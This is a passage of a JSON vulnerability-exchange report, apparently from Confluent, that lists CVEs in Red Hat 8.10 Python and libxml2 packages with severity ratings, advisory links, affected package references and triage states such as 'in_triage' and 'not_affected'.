          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.3,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        22,
        59
      ],
      "description": "tarfile.extractall() with the 'data' or 'tar'\n filter could be bypassed by a crafted archive where a hardlink \nreferences a symlink stored at a deeper name than the hardlink itself.\u00a0 \nThe extraction fallback validated the symlink at it's archived location \nbut recreated it at the hardlink's shallower\npath, letting a relative\n target the filter judged contained escape the destination directory.\u00a0 \nThis allowed a malicious tar archive to create a symlink pointing \noutside the destination, enabling out-of-destination file reads or \nwrites. This was an incomplete fix of CVE-2025-4330.",
      "recommendation": "Upgrade platform-python to version 3.6.8-78.el8_10; Upgrade python3-libs to version 3.6.8-78.el8_10",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11940"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54268"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11940"
        },
        {
          "url": "https://bugzilla.redhat.com/2491848"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2491848"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-11940"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-54268.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:54268"
        },
        {
          "url": "https://github.com/python/cpython/commit/0f852b3f07dd8e71e40326a51c02afbf16a42cc5"
        },
        {
          "url": "https://github.com/python/cpython/commit/27dd970bf6b17ebca7c8ed486a40ab043ed7af8f"
        },
        {
          "url": "https://github.com/python/cpython/commit/672825e2f36a57e173959b0d9d409d4560dab8df"
        },
        {
          "url": "https://github.com/python/cpython/commit/771d12dda5140313db0ac550292987975651bbde"
        },
        {
          "url": "https://github.com/python/cpython/commit/79c06bd5c6afa3c440d50faf7ee1b147c8832b4c"
        },
        {
          "url": "https://github.com/python/cpython/commit/be13e86f6b9788a6f4d0419dffef72cbae5865c9"
        },
        {
          "url": "https://github.com/python/cpython/commit/e5fdbd8d5aa923bd9111b112ea73bd6ec7c47877"
        },
        {
          "url": "https://github.com/python/cpython/issues/151558"
        },
        {
          "url": "https://github.com/python/cpython/pull/151559"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-11940.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-56219.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/LD6QIISNQFQYOIEPJNEUIPV7S3V76FZH/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11940"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11940"
        }
      ],
      "published": "2026-06-23T17:16:40+00:00",
      "updated": "2026-08-13T01:16:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-11972",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        252,
        606,
        770
      ],
      "description": "When using the \"tarfile\" module with a file opened in \"streaming mode\" (mode=\"r|\") the tarfile module did not properly handle EOF, making archive parsing take exponentially longer.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11972"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11972"
        },
        {
          "url": "https://github.com/python/cpython/commit/3f031d431f80668e14f3bc066bbf4369cd9281b9"
        },
        {
          "url": "https://github.com/python/cpython/commit/4ce6bf7c8aa7725828a38981c306f214c1f29365"
        },
        {
          "url": "https://github.com/python/cpython/commit/7f0dc59c9a70f8f3b4da33d7c4a2ba552a7acc21"
        },
        {
          "url": "https://github.com/python/cpython/commit/e86666c9dd256d52d0fbef6feb1ea4a51768fdec"
        },
        {
          "url": "https://github.com/python/cpython/commit/eb63c0f94dfcbea7fda8eab6213818e134d67192"
        },
        {
          "url": "https://github.com/python/cpython/commit/f50bf13566189c8d0ce5a814f33eff3d89951896"
        },
        {
          "url": "https://github.com/python/cpython/commit/f5e2776ff0383a902c12acf2b703e7e951fc8438"
        },
        {
          "url": "https://github.com/python/cpython/issues/151981"
        },
        {
          "url": "https://github.com/python/cpython/pull/151982"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/AXPSKKTSRKXTTJULW3XSIC74WZNAAPPB/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11972"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11972"
        }
      ],
      "published": "2026-06-23T23:16:49+00:00",
      "updated": "2026-08-13T01:16:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11979",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        121
      ],
      "description": "libxml2 is vulnerable to multiple stack-based buffer overflows in the xmlcatalog utility when running in --shell mode. The usershell() function processes user input using fixed-size stack buffers without proper bounds checking.\nBy supplying an overly long input line, an attacker can overflow internal buffers (command, arg, and argv) during input parsing. This results in memory corruption within the stack frame.\nSuccessful exploitation may cause a crash or potentially allow arbitrary code execution in the context of the xmlcatalog process.\n\nThis issue has been fixed in the commit c2e233fc.\n\nNOTE:\nThe maintainers of this project did not agree that this issue is a vulnerability and considered it a bug.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11979"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11979"
        },
        {
          "url": "https://cert.pl/en/posts/2026/06/CVE-2026-11979"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/commit/c2e233fc1b341685fc99621b2768b503f777a72e"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11979"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11979"
        }
      ],
      "published": "2026-06-29T14:16:40+00:00",
      "updated": "2026-06-30T20:22:07+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.9.7-21.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-12610",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H"
